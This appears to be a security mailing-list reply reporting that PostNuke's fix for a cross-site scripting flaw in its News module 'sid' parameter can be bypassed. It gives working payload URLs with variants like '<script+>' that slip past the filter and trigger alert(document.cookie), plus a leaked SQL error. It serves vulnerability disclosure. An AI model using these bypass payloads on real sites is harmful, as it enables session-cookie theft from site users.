Humm!
> on 26th Sep the following url: > http://news.postnuke.com/modules.php > >?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> > > used to give Alert PopUp and > Error: > DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' > at line 23 > > now it gives: > Sorry - $HTTP_GET_VARS contains javascript... > > Prompt fix by PostNuke team, great work Keep it up! :) Not so fast on the praise :( It only took me a couple of workarounds to find ways to bypass the check. http://news.postnuke.com/modules.php ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> Using the request... ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script> gives me the DB Error: message And using the request... ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script> gives me the Alert Popup and DB Error: message... the '+' is treated as a blank. Thanks... Dan.
